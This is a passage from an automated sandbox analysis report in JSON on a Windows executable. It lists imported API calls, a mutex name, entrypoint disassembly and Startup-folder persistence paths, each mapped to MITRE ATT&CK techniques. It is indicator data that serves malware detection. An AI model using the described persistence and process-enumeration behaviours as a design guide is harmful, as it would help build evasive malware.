\"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDIBits\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"BitBlt\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SelectObject\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteObject\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ChangeServiceConfigA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorSacl\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"AddAccessAllowedAce\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTokenInformation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetMalloc\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VerQueryValueA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileVersionInfoA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileVersionInfoSizeA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RpcStringFreeA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UuidToStringA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UuidCreate\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetStdHandle\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetErrorMode\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemInfo\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"WSAGetLastError\" (Indicator: \"GetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"CommandLineToArgvW\" (Indicator: \"CommandLineToArgv\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pctfjohcnupctfjohcnupctfjo\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"pctfjohcnupctfjohcnupctfjo\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"gegdsimsogm.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A9C8A7.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" file has an entrypoint instructions - \"push\t0x60,push\t0x407170,call\t0x402bf0,mov\tedi, 0x94,mov\teax, edi,call\t0x403900,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x407074],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x46f3c0], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x46f3cc], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x46f3d0], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x46f3c4], esi,cmp\tecx, 2,je\t0x4028c5,or\tesi, 0x8000,mov\tdword ptr [0x46f3c4], esi,shl\teax, 8,\"\n \"gegdsimsogm.exe\" file has an entrypoint instructions - \"push\t0x60,push\t0x42b7f0,call\t0x42213c,mov\tedi, 0x94,mov\teax, edi,call\t0x421ba0,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x42a080],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x463b20], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x463b2c], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x463b30], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x463b24], esi,cmp\tecx, 2,je\t0x4229a3,or\tesi, 0x8000,mov\tdword ptr [0x463b24], esi,shl\teax, 8,\"\n \"DISMHOST.EXE.67A9C8A7.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-322", "type": 2, "relevance": 1, "name": "Contains ability to move file or directory (API string)", "description": "Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\":\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005872.00000003.75601.00260000.00000004.mdmp\n \"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005872.00000003.75601.00260000.00000004.mdmp\n 00000000-00005872.00000003.75601.01390000.00000002.mdmp\n \":\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005872.00000003.75601.00260000.00000004.mdmp\n \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005872.00000003.75601.00260000.00000004.mdmp\n 00000000-00005872.00000003.75601.01390000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 